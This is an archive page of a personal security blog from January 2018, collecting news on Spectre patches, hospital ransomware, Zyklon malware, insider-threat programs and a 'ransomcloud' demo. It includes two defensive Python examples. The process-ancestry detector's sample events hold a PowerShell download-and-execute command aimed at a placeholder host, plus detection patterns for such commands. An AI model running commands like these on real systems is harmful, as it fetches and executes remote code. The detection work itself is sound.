Sherman's Security Blog
I am Sherman Hand (also known as Policysup). I have created this blog and will use a part of my day to write about what is going on in the world. I hope to discuss things in a down-to-earth and practical way. I hope to hear back from you on your thoughts. I do not in any way intend to speak for my employer. The content of this blog will be either opinions that are strictly mine, general observations, reposts, or information that is already in the public domain.

Monthly Archives: January 2018

Intel is recommending that vendors and end users stop deploying the current version of its patch designed to fix the Spectre/Meltdown vulnerabilities that were discovered in most of the company’s processors, along with some from AMD and ARM, and wait for a new patch to be finalized.

The company said it has identified the root cause of the problem in its Broadwell and Haswell processor lines and is in the process of testing an early version of an updated patch to some industry partners, said Navin Shenoy, executive vice president and general manager of the Data Center Group at Intel, in a company blog. When testing is completed a final version will be released.

“We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions, as they may introduce higher than expected reboots and other unpredictable system behavior,” he wrote.

Another hospital in Indiana has suffered a ransomware attack that affected some of its servers and prevented files from loading correctly.

On 11 January, an employee of Adams Memorial Hospital of Decatur, Indiana notified administrators that some files didn’t look correct. Susan Sefton, a spokesperson for the hospital, said the network went blank before files on the system read “sorry.”

Bitdefender reasons that the modification is likely the result of “I’m Sorry,” a type of ransomware discovered in 2017. I’m Sorry appends “imsorry” to every file it encrypts on an infected machine. It then drops a .txt file containing instructions for how the user can pay the ransom into each folder on the infected computer that contains encrypted files.

A screenshot of the I’m Sorry ransom note. (Source: PCrisk)

As a result of the attack, the Berne Outpatient Clinic and three physicians were unable to use the hospital’s network to access patient history or schedule appointments. This unavailability affected between 60 and 80 patients.

Doctors have since regained access to the network, but there’s still the question of whether the attack affected patients’ information. Adams Memorial Hospital doesn’t seem to think so. As it told WANE-TV:

While AHN did experience a business interruption throughout the weekend as we worked to restore the affected servers, there was never an interruption in patient care. We are continuing to assess the severity of the situation, but at this time we believe no patient files have been accessed. At no time during this event has the quality and safety of patient care been affected.

The attack occurred on the same day that Hancock Regional Hospital of Greenfield, Indiana suffered a ransomware attack. That incident ultimately prompted the hospital to pay $50,000 in ransom to those responsible for the infection.

These assaults demonstrate that the risk of a ransomware attack is growing for hospitals. With that said, healthcare organizations more generally need to strengthen their network security measures and take extra care in maintaining the security of their electronic medical record systems.

The Zyklon malware is designed to recover passwords from popular web browsers, PC gaming software, and email services, among other software. The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero, according to a Jan. 17 Trend Micro blog post.

The malware is publicly available and has been observed in the wild since early 2016. It provides threat actors with sophisticated capabilities such as a full-featured backdoor capable of keylogging, the ability to execute additional plugins like cryptocurrency miners, and the ability to conduct distributed denial-of-service (DDoS) attacks, self-update, and self-remove.

Zyklon is spread via malicious spam attachments in a ZIP file containing a DOC file that exploits at least three known vulnerabilities in Microsoft Office including CVE-2017-8759 and CVE-2017-11882. The malware communicates with its command and control (C2) server over the Onion Router (Tor) network and provides a very efficient mechanism to monitor the malware’s spread and impact.

“What stands out the most to me is that the Zyklon malware is being packaged with pricing tiers based on features,” Chris Morales, Vectra’s head of security analytics, told SC Media.

Threat actors could purchase the normal build of the malware for $75 or the Tor-enabled build for $125, as well as updates for $15, all of which is payable in Bitcoin.

Morales said the malware is a very capable piece of code, yet it exhibits a sequence of common attacker behaviors similar to any other attack with the intent to infect, spy, spread, and steal information. He added that he has seen many attacks now leveraging Tor for outbound communication and PowerShell for malware updates.

He added that the Windows vulnerabilities used for Zyklon appear to have first been observed in the wild through the detection of another piece of malware, meaning we have no idea how long attackers have known about the vulnerability or when they developed an exploit.

“This is true of every vulnerability ‘discovered and published’ by a threat researcher or security company. Attackers are not keen to publish or share any type of information they already have, and they could sit on this information for a very long time before leveraging an exploit for a vulnerability in a new piece of malware,” Morales said.

Experts agreed. Meni Farjon, co-founder and chief technology officer of SoleBIT Labs, told SC Media the vulnerabilities picked by the threat actors behind the malware are unique as they all share the common characteristic of being 100 percent reliable across almost all Windows versions.

“Normally, code execution exploits combine memory-based corruptions, which can lead to unreliable situations on some victims’ PCs and failing to infect,” Farjon said. “These vulnerabilities do not corrupt the memory and are almost fully ‘logical.’”

Farjon added that the bugs will even work on a 10-year-old Windows system, ensuring extremely high reliability of infection, and that this demonstrates the actors behind Zyklon are preparing for a massive campaign at some point.

Lenny Zeltser, vice president of products at Minerva Labs, told SC Media that the approach used in the malware campaign demonstrates some of the ways adversaries bypass information security defenses, and that using Microsoft Office documents together with PowerShell, as well as employing memory injection, is often effective against detection-based anti-malware tools.

“Don’t get me wrong: There is clearly a need for some form of baseline anti-virus protection,” Zeltser said. “However, enterprises should consider ways of augmenting such defenses, for instance by employing technology that makes it harder for the attacker to evade detection.”
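The Zyklon write-up above describes a malicious DOC spawning PowerShell that pulls updates over the network. Detecting that parent-child relationship in process telemetry is one of the "augmenting" controls Zeltser alludes to. The following is an added example, not code from SC Media, Vectra, SoleBIT or Minerva: it walks a small set of constructed process-creation events (fields modelled loosely on Sysmon Event ID 1, but the pids, paths, file names, the URL and the encoded token are all made up for this example) and flags script hosts whose ancestry, up to three levels, leads back to an Office application, scoring the command line for the usual evasion flags.

```python
import re

# Constructed process-creation events (pid, ppid, image, cmdline). Everything here
# is made up for the example; the URL uses the reserved .invalid TLD and the -enc
# token is a placeholder, not a real payload.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 800,  "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n invoice.doc'},
    {"pid": 4388, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},
    {"pid": 5000, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": '"EXCEL.EXE" /e report.xls'},
    {"pid": 5100, "ppid": 5000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start"},
    {"pid": 5200, "ppid": 5100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/u')\""},
    {"pid": 6000, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},   # admin script from explorer: benign
    {"pid": 6100, "ppid": 4120, "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 8192"},                              # print helper from Word: benign
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line patterns that raise the severity of an Office-spawned script host.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I), "network download"),
    (re.compile(r"-nop\b|-noprofile", re.I), "profile bypass"),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events, max_depth=3):
    """Return findings for script hosts whose ancestry (up to max_depth) includes an Office app."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        if basename(event["image"]) not in SCRIPT_HOSTS:
            continue
        chain, current, office_parent = [basename(event["image"])], event, None
        for _ in range(max_depth):
            parent = by_pid.get(current["ppid"])
            if parent is None:
                break
            chain.append(basename(parent["image"]))
            if basename(parent["image"]) in OFFICE_APPS:
                office_parent = parent
                break
            current = parent
        if office_parent is None:
            continue  # script host not launched (directly or indirectly) by Office
        indicators = [label for rx, label in SUSPICIOUS_ARGS if rx.search(event["cmdline"])]
        findings.append({
            "pid": event["pid"],
            "chain": " <- ".join(chain),
            "severity": "high" if indicators else "medium",
            "indicators": indicators,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid {f['pid']}: {f['chain']} {f['indicators']}")
```

The intermediate `cmd.exe` hop matters: a detection that only looks one level up misses the Excel → cmd → PowerShell chain, which is why the ancestry walk goes several levels. The benign PowerShell launched from Explorer is left alone, so the rule stays usable on hosts where administrators run scripts.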

Virtual tourism is a little heavy in 2018. Sure, you’ve seen the Minecraft Eiffel Tower and beamed aboard the Minecraft USS Enterprise, but have you considered where you might wait out the end of days? Well, not you exactly, but people more important than you.

To draw attention to the escalating threat of global nuclear annihilation, the Nuclear Threat Initiative (NTI), which works to “prevent catastrophic attacks with weapons of mass destruction and disruption—nuclear, biological, radiological, chemical and cyber,” has partnered with the James Martin Center for Nonproliferation Studies to craft a virtual tour of the nuclear fallout facilities that Russian and/or American leadership will be whisked into in the event of nuclear war.

The team has really outdone itself with the Fallout-esque teaser video.

As NTI explains:

Nothing better illustrates the continuing absurdity of plans to fight a nuclear war than the massive complex of underground bunkers that the United States and Russia have built to survive and fight on even after both societies have collapsed. To help explain the scale of these facilities, we have reconstructed two, Site R in rural Pennsylvania (also known as Raven Rock) and the Kosvinsky underground command facility in Russia, roughly to scale using the popular immersive gaming platform Minecraft.

For anyone with the game, you can fire up a multiplayer instance of Minecraft, select “direct connect” and put in server address 185.38.151.31:25566 to visit Raven Rock, the underground makeshift Pentagon located near Camp David, or 185.38.151.2:25566 to tool around Kosvinsky, “a survivable command post” that serves as Russia’s equivalent. NTI cautions that it only lets zombies out on the weekends.

For anyone without Minecraft, you can take an in-browser virtual tour on NTI’s post about the project, which is also chock full of interesting nuclear bunker facts that put the existence of such underground facilities in an appropriately dark context. The tour is much clunkier outside the game, but the Minecraft experience actually looks pretty cool in that eerie we-definitely-won’t-survive-but-these-people-probably-will way.

If you’re on-board for Amazon’s monthly Prime membership, I’ve got a bit of bad news for you on this cold January morning. The company’s bumping up pricing from $10.99 to $12.99. Not the end of the world, of course, but that comes out to about $156 a year — a $24 increase over the old price.

Amazon has confirmed the price increase with TechCrunch and laid all of this out on its Prime page. It also handily points out if you bite the bullet and pay the $99 yearly fee all up front, pricing will stay the same. In other words, the company would really like to just lock you into that lump sum. The company settled on the yearly pricing back in 2014, when things went up by $20.

The increase will also impact the company’s newly introduced student pricing. That also gets an 18-percent increase, moving from $5.49 to $6.49. Like the standard Prime membership, the yearly fee is staying put at $49.

If you’re already locked into Amazon’s ecosystem, it’s still a good deal with the free shipping and access to Prime Video, Music, et al. For Amazon, it’s been a wildly successful method for becoming a one-stop shop for consumers. And if the company can convince you to opt-in on a per-year basis, all the better.

The fee kicks in today for new members. Existing subscribers will see the increase go into effect on the first renewal payment after February 18.

At least some of those events likely resulted from retailers’ poor data breach preparation. Consider the fact that just 28 percent of IT security professionals told Tripwire in November 2017 that their organization had a fully tested plan in the event of a breach.

SO WHAT CAN RETAILERS DO TO MAKE SURE THEY DON’T FALL VICTIM TO A DATA BREACH IN 2018?

Added protections like chip-and-PIN and end-to-end encryption are good improvements for consumers.

Even so, organizations would be wise to step up their defenses in 2018. That’s because malicious actors are constantly developing new methods of attack with which to target retailers. To illustrate, Forrester Research anticipates cyber-criminals will begin developing point-of-sale (POS) ransomware in 2018, making retailers their next lucrative target for extortion-based ransom demands.

Cybercrime shows no signs of slowing down. As a result, retailers would have a lot to gain by going beyond compliance and taking a holistic approach to securing and maintaining the integrity of their systems.

Such measures would help protect them against security incidents and their consequences, like negative headlines, angry customers, and hefty fines. Take the European Union’s General Data Protection Regulation (GDPR), for example. Failure to comply with GDPR could result in fines of up to 4 percent of the annual turnover of the business.

The consequences could even be more serious than legal fees and unflattering press. Following Uber’s most recent data breach disclosure, top Democrats in the United States Senate introduced the Data Security and Breach Notification Act. The legislation would require companies to report data breaches within 30 days. If an individual knowingly conceals a data breach, they could face up to five years in prison under the legislation.

PCI requirements like multi-factor authentication can help companies take steps in the right direction. However, strategic, foundational steps need to be taken to preserve system integrity.

Organizations should think of this as a business journey and not a check-box exercise. Before looking at specific tools or technologies, they should therefore take a look at what foundational steps they need to take to preserve system integrity:

KNOW YOUR ATTACK SURFACE

Organizations should make sure they have visibility into the devices and software they have on their networks. Are there unauthorized devices on the network? Is there unauthorized or unmanaged software throughout the network that brings risk into the environment?

From there, organizations can define their attack surface: the sum total of points of interaction that could present access to a vulnerability or misconfiguration. An attack surface also covers fully authenticated and authorized connections. Indeed, every interaction with a corporate network presents a certain amount of risk, so it’s important that an organization documents each and every connection to understand the corresponding level of risk posed to the business.

MINIMIZE YOUR ATTACK SURFACE

Once organizations know what they have on their networks, they need to make sure that all those devices, applications, and operating systems are configured properly and securely. They should be configured to a defined ideal and secure state following industry best practices and standards as well as internal policies. This is often called “hardening” systems to reduce the attack space.

Given the number of interactions in most corporate IT environments, it’s unlikely that organizations can reduce the entire attack surface in a single enterprise-wide project. Even so, they can target the points where reduction yields the greatest benefit. They should also review their vulnerability management program and other tools to determine whether those solutions can be configured to provide insight into the attack surface.

MONITOR YOUR ATTACK SURFACE

Once systems are configured and patched appropriately, they should be monitored for any changes and new risks. This includes checking for and fixing vulnerabilities, making sure secure configurations are maintained, managing administrative privileges, and paying attention to log data. Keeping track of administrative privileges and log activity will also help identify and investigate suspicious activity.

Organizations should then take this information and track it over time. Whatever trends result from that process can eventually help them make business decisions that reduce risk. For guidance on how to communicate those trends to decision-makers at your company, click here.
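The three steps above (know, minimize, monitor) come down to keeping a known-good baseline of what is on each system and noticing when it drifts. The following is an added example, not code from the article or from Tripwire or any other vendor: it takes a file-integrity snapshot of a configuration tree (SHA-256 of content plus permission bits), then compares a later snapshot against it and classifies every difference. The configuration files, their contents and the simulated changes are constructed inside a temporary directory so the example runs offline.

```python
import hashlib
import os
import stat
import tempfile


def snapshot(root):
    """Record SHA-256 and permission bits for every regular file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks and special files are out of scope here
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root)
            manifest[rel] = {"sha256": digest.hexdigest(), "mode": stat.S_IMODE(st.st_mode)}
    return manifest


def diff(baseline, current):
    """Compare two manifests and classify every difference."""
    report = {"added": [], "removed": [], "modified": [], "mode_changed": []}
    for rel in sorted(set(baseline) | set(current)):
        before, after = baseline.get(rel), current.get(rel)
        if before is None:
            report["added"].append(rel)
        elif after is None:
            report["removed"].append(rel)
        else:
            if before["sha256"] != after["sha256"]:
                report["modified"].append(rel)
            if before["mode"] != after["mode"]:
                report["mode_changed"].append((rel, oct(before["mode"]), oct(after["mode"])))
    return report


def _write(root, rel, text, mode):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)
    os.chmod(full, mode)


def demo():
    """Build a constructed config tree, baseline it, simulate drift, and report."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed "hardened" state (file names and contents are illustrative only).
        _write(root, "sshd_config", "PermitRootLogin no\n", 0o600)
        _write(root, "app/settings.ini", "debug=false\n", 0o644)
        _write(root, "cron.allow", "root\n", 0o644)
        baseline = snapshot(root)

        # Simulated drift between two monitoring runs.
        _write(root, "sshd_config", "PermitRootLogin yes\n", 0o600)  # hardening undone
        os.chmod(os.path.join(root, "app/settings.ini"), 0o666)        # now world-writable
        _write(root, "app/debug.hook", "run-as-root\n", 0o644)         # unexpected new file
        os.remove(os.path.join(root, "cron.allow"))                   # control removed
        return diff(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, items in demo().items():
        print(kind, items)
```

In practice the baseline is taken right after a system is hardened and patched (the "minimize" step), stored somewhere the monitored host cannot alter, and the diff is run on a schedule; each finding then maps back to a change ticket or to an investigation.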

GOING BEYOND THE CHECK-BOX…

Major data breaches often come down to a simple misconfiguration or a failure to patch a known vulnerability. With that said, strong system integrity and an adequate security posture must be built strategically and holistically, not through a check-box exercise. Only then can organizations effectively comply with PCI and GDPR and, most importantly, manage their risk of serious data breaches and cyber incidents.

Interested in learning about the latest processes and technologies used to protect payment and personal data? Consider attending the 16th PCI London event. You can learn more about the event here.

Proposed amendments to the United Kingdom’s Data Protection Bill would help protect security researchers working with anonymized data.

Introduced by Lord Ashton of Hyde, Parliamentary Under-Secretary of State at the Department for Culture, Media and Sport, the draft changes (PDF) address Clause 162 of the third generation of data protection law that has entered the UK Parliament thus far.

This particular article makes it “an offence for a person [to] knowingly or recklessly to re-identify information that is de-identified personal data without the consent of the controller responsible for de-identifying the personal data.” In other words, a security researcher could potentially face criminal charges for proving that anonymized information can be manipulated in such a way that the subjects to which the data pertains can once again be attributed.

The Data Protection Bill as currently written (PDF) does outline certain “defenses” under which a person could justify their decision to re-identify. Those items include obtaining the consent of either the data subject or controller as well as proving that re-identification served the public interest.

Lord Ashton of Hyde’s changes add on to those possible exceptions with the introduction of “effectiveness testing conditions.” To meet those qualifications, a person would need to have acted with a view of testing the effectiveness of the de-identification measures in the aim of serving the public interest and not causing harm. That person would also need to have notified either the Commissioner or the controller(s) responsible for de-identifying the data about their re-identification within a period of less than 72 hours if possible.

A screenshot of one of Lord Ashton of Hyde’s proposed changes to the Data Protection Bill.

Privacy researcher Lukasz Olejnik feels that the changes are a step in the right direction. As he told The Register:

“GDPR is intended as a pro-consumer data privacy regulation. It was surprising that the UK’s Data Protection Bill proposals contained clauses that potentially could later be misused to target security and privacy researchers…. [The proposed changes] contain some reasonable compromises. Although such research is still regulated, researchers acting in the public interest will have less to worry about if they disclose vulnerabilities to the Information Commissioner’s Office.”

The Data Protection Bill is separate from the EU GDPR. Yet as the Information Commissioner’s Office notes, the Bill helps specify how the Regulation applies to individual states like the United Kingdom. The ICO’s view is that “[i]t is therefore important the GDPR and the Bill are read side by side.”

In 2017, some of the world’s most devastating cyber attacks were seen. Insider threats continue to be the primary reason for such high profile data breaches year over year.

With the rise of malware as a service, insiders are now more than capable of sabotaging a company’s operations or stealing data to sell on the darknet. Without the right support from management, preventing severe data breaches can become near impossible. Malicious insiders paired with increasingly dangerous malware means that management needs to be actively involved in security.

It is common for management to assume that cyber security is a matter best handled by the IT department or the internal cyber security team. However, this is far from what good cyber security practice means today. Much of this illusion is due to the inherent technical nature of cyber security; the other aspects of people and processes are not emphasized as much.

This article specifically focuses on best management practices to improve the people and process side of cyber security. Let us discuss how organizations of any size can take measures to ensure that their cyber security is top of the line.

DIGITAL ASSET IDENTIFICATION

The operational definition that we use for asset comes from the ISO 55000.

According to the ISO standard, an asset is something with current or potential value to an organization, and is under their responsibility.

While ISO 55000 is focused on physical asset management, this definition also applies to digital assets, including data. What makes a “critical asset” goes beyond value: a critical asset is one whose degradation in any way could severely damage the ability of an organization to continue operations.

Data is one of the single most important assets for any organization in today’s world.

However, not all data is equal in business. Every business is responsible for the data of its customers, partnerships, inventory, vendors, and its own operations. Data that flows through an organization usually includes the company’s financial data, operations data, personally identifiable data of customers, and at times classified data.

The first step to helping with data breach prevention is to identify and categorize data. While IT has insight into how your information systems are running, they do not have full insight into the operations and processes of the business as a whole. As a manager, this is where you come to their aid.

When categorizing data, it typically falls into the following groups: public, internal, classified, and regulation required. It is important to label which types of data are associated with each process in your organization. Cyber criminals often do not try to target all categories of data. At times, it could be only internal data they seek; other times, it could be internal, classified, or regulation required. Often, cyber criminals and insiders have very specific data they are attempting to acquire.

INSIDER THREAT PROGRAM

Insider threats are a unique security issue that each organization faces. They thus require specialized resources for addressing the problem.

This is where an insider threat program comes in. An insider threat program is an organization-wide program that features a unified vision and mission, roles, duties, and specialized training. Insider threat programs should ideally include HR, legal, IT, engineering, data owners, and department directors. Above all, the program should include only the most trusted individuals in the organization.

Insider threat programs work to establish a source of relevant information, set of protocols, and mechanisms to detect, prevent, and respond to insider threats. Included in the insider threat program should be: mission, detailed budget, governance structure, and a shared platform.

Those are just for the formation; the work of the insider threat program should include:

Compliance and Process Oversight Board: This group exists to review as-is work processes for the organization and recommends changes to prevent insider threats before a data breach occurs.

Reporting Mechanisms: Office politics, clique behavior, and a host of other factors can prevent an employee from reporting suspicious behavior. This is why reporting mechanisms of suspicious insiders need to be made confidential to prevent any retaliatory action against whistleblowers.

Incident Response Plan: So you’ve identified an insider threat, and you may even have proof of a data breach by them. Do you just fire them and report them to the authorities? These questions and more are answered clearly as you develop an insider incident response plan. These plans explain step by step how alerts are identified, managed, and escalated. Along with those details, you will also need to include time frames for every action and procedure.

Specialized Training: The insider threat training details an awareness and training program for all personnel in the organization. However, people directly involved in the Insider Threat Program will receive even more specialized training to better detect and mitigate insider threats.

Infrastructure: This component is straightforward; it is simply the infrastructure to detect, prevent, and respond to insider threats: the technology that supports management’s effort to achieve its mission. The technology deployed should be reviewed regularly for the most optimal alternatives.

There are in total about thirteen components to a typical insider threat program. The other ones not listed include: civil liberty protections, communication framework, insider threat program supporting policies, data collection tools, vendor management, and risk management integration.

SECURITY VETTING AND MONITORING (HR)

When hiring personnel, one of the preemptive moves you can make to secure your organization is to perform a background check on the candidate. Organizations often perform these checks for cost-reduction purposes, but in the context of cyber security, the hiring process is where security with personnel begins.

Some things to look out for are a criminal history and truthfulness about employment history. Malicious insiders, who can at times be spies, can make their way into your organization by presenting themselves as the perfect candidate.

The higher the risk level, the more trust and security prerequisites required to work that position. When a new hire comes into a position with a higher risk, they should be monitored more closely by supervisors for high risk behavior. Additionally, any incidents should be documented and analyzed for behavior trends. Behavior analytics and risk profiling technology can be a great aid in this process.

HR should also have a termination protocol prepared for when it is time to let an employee go.

The protocol should require managers to conduct an exit interview, provide final performance appraisal, and discuss final paycheck arrangements. IT should delete all of the departing employee’s accounts.

If they are a privileged user, then IT needs to change all shared passwords. HR needs to make clear once again any intellectual property agreements to the departing employee.

HEALTHY WORK CULTURE AND MINIMIZED STRESS

Often, productivity is prioritized above all else, which can mean setting goals that would drive anyone to high stress levels. When people are stressed, all sorts of negative things start happening, such as more mistakes, ill will towards one another, and a feeling of being ignored.

These are just a few, but even in these few, you have the perfect conditions for both negligent and malicious insider threats to flourish. To avoid these conditions, it helps to understand what are the most pressing challenges to developing a healthy work culture.

One challenge was mentioned above: managing productivity and stress levels. Other challenges include baselining employee productivity and understanding the costs and benefits of reducing stress. Identifying how these challenges apply to your organization will help you understand some operational process improvements that can be made.

Reducing stress may mean a new management style needs to be implemented, such as project-oriented task management. Another method of reducing stress may be to understand how you’re measuring success, key performance indicators (KPI), and how those are contributing to work culture.

An example of harmful KPIs would be if a call center was measuring phone calls made as their KPI rather than customers landed. By measuring phone calls made, the quantity of phone calls forces employees to meet a certain goal that could contribute to poor customer service, unnecessary competitiveness, and increased mistakes.

Simply changing the KPI to customers landed also changes where the pressure is for employees. Now employees can have more meaningful interactions with customers and will be more likely to take care to ensure there are fewer mistakes.

The core takeaway from this example is to use KPIs that align with your context. Encourage thought before action. For your organization, try to identify the root cause of issues in work culture and then work to fix it.

VENDOR MANAGEMENT PROGRAM & POLICIES

While you are working to ensure your organization is secure from insider threats from employees, your vendors and business partners may not have been so diligent.

It is for this reason that you need a vendor management program. Vendor management programs are a series of protocols that are designed for accountability and monitoring between your organization and the vendors you work with. Vendor management programs are a responsibility of management. IT can only do so much, and if management is not setting some standards prior to vendor engagement, then IT will have to dedicate limited resources to mitigating vulnerabilities.

These programs are defined by four phases: definition, specification, controls, and integration.

The definition phase of a vendor management program involves identifying the most mission-critical vendors to your organization. Mission critical in this context means vendors that you rely on to be successful and that any relationship issue could have a negative impact on operations and revenues.

The next phase, specification, is concerned with appointing a security liaison for each vendor you work with. The responsibilities of this liaison are to maintain compliance knowledge, perform audits, facilitate security communications, provide training, track contracts and all documentation, and impose general oversight.

Once those two phases are covered, then comes the heavy lifting for management, the development of vendor policy and controls.

When drafting vendor policy, the document should include the right to audit security controls, requirement for vendor compliance with monitoring, security performance reporting, and timely notification of any data breach.

By developing these policies, the security liaison will have a strong base from which to perform their duties. However, the success of the liaison is very dependent on what management requires of vendors and sets as controls in this phase.

The final phase is integration, which is primarily concerned with data collection, analysis, and validation.

Information about your supply chain should be accessible to you. Without that data, you will be unable to understand your full security position. The information collected needs to be integrated with your organization’s existing security practices and auditing procedures. Without full integration, the vendor management program becomes a side activity, which is not how you want to handle cyber security.

MANAGEMENT’S CRITICAL ROLE

Preventing insider threats is not the job of IT alone. Only with the dedicated support of management can a business best prevent insider threats.

The recommendations above are just a few ways in which management can help prevent insider threats. Leadership in an organization impacts process development, hiring practices, business relationships, and work culture.

If any one of those areas creates vulnerabilities, then the business will remain at high risk for an insider-related data breach. Managers can stay alert by following the CERT Insider Threat Center to find more resources.

KnowBe4’s Chief Hacking Officer Kevin Mitnick called me with some chilling news. A white hat hacker friend of his developed a working “ransomcloud” strain, which encrypts cloud email accounts like Office 365 in real time. My first thought was: “Holy $#!+”.

I asked him: “Can you show it to me?”, and Kevin sent me a video demo, you can see it below. Lucky for us, this type of ransomware strain is not in the wild at the moment.

When I started looking into it, the proof of concept that he mentions in the video has been around for a while, but it’s on the horizon, because if a white hat can do this, so can a black hat. I am wondering why they haven’t already, because it’s not all that hard to do.

This strain uses a smart social engineering tactic to trick the user to give the bad guys access to their cloud email account, with the ruse of a “new Microsoft anti-spam service”.

Once your employee clicks “accept” to use this service, it’s game over: all email and attachments are encrypted in real time! The ransomcloud attack will work for any cloud email provider that allows an application to be given control over the email via OAuth. With Google it will work if you get the app past their verification process. Outlook365 doesn’t verify the app at this point, so it’s much easier.

See it for realz here (video is just 5 minutes) and shiver:

What Kevin recommends at the end of the video, “Stop, Look and Think before you click on any link in an email that could potentially give the bad guys access to your data,” is now more true than ever.

If you are a KnowBe4 customer and use either Gmail or O365, I recommend sending the special phishing template we created for this called “Microsoft AntiSpamPro Ransomcloud” and it lives in the “Phishing for Sensitive Information” category.

What Percentage Of Your Users Would Click On That Link?

Organizations are moving millions of users to O365. However, this video proves that being in the cloud does not automatically mean you are secure. The Phish-prone percentage of your users is your number one vulnerability, as they remain the weakest link in your IT security, cloud or not.

A hospital shut down its network after a ransomware attack restricted authorized personnel’s access to some of its computer systems.

On 12 January, Hancock Regional Hospital confirmed in a statement that it had suffered a ransomware attack. As quoted by FOX59:

Hancock Regional Hospital has been the victim of a criminal act by an unknown party that attempted to shut down our operations via our information systems by locking our computer network and demanding payment for a digital key to unlock it. Unfortunately this sort of behavior is widespread in the world today, and we had the misfortune to be next on the list. We are working closely with an IT incident response company and national law enforcement. At this time, we are deep into the analysis of the situation and see no indication that patient records have been removed from our network. In addition to excellent performance by our IT Department, our clinical teams have performed exceptionally well, and patient care has not been compromised. Our doors are open at Hancock Regional Hospital.

The Daily Reporter writes that the trouble first started on 11 January when staff noticed the network was running much slower than usual. Not long thereafter, a message appeared on at least one hospital-owned computer’s screen stating that authorized personnel wouldn’t be able to access parts of the Greenfield-based healthcare provider’s systems until it paid a ransom in Bitcoin. The amount of that ransom demand isn’t known at this time.

Hancock Regional’s IT team decided to immediately suspend the hospital’s network while it works with the FBI and a “national IT security company” to determine what happened and how it should respond. Hancock Health CEO Steve Long said the ransomware attack didn’t originate from a malicious email but declined to provide additional comments about its delivery vector.

Long did say, however, that the ransomware didn’t significantly affect patient care. The hospital posted a notice at its entrances on 12 January informing patients of a “system-wide outage.” Even so, doctors and nurses were able to update patients’ medical records using pen and paper and to fulfill most of the scheduled appointments that weren’t cancelled due to inclement weather.

Rob Matt, the hospital’s chief strategy officer, told IndyStar that the hack affected Hancock Regional’s electronic health records, among other systems, but that it had not exposed patients’ information:

What we do know is that no patient information has been affected, so at this point, there’s no understanding of any consequence other than our system is being held. We, like other hospitals, do disaster drills all the time, so this aligns perfectly well with drills that we’ve had throughout the years on how to continue to deliver world-class care when you have system failures or system breaches.

Unfortunately, Hancock Regional isn’t the first hospital to suffer a ransomware attack. Hollywood Presbyterian Medical Center made headlines in February 2016 when the southern California medical center paid $17,000 for the restoration of its systems following a ransomware attack. More than a year later, the May 2017 global outbreak of WannaCry ransomware affected 34% of National Health Service (NHS) trusts in England.

Attackers will continue to target hospitals with ransomware going forward. With that said, it’s important that healthcare providers everywhere protect their systems against crypto-malware and other digital threats. To learn how Tripwire’s solutions can help in this regard, click here.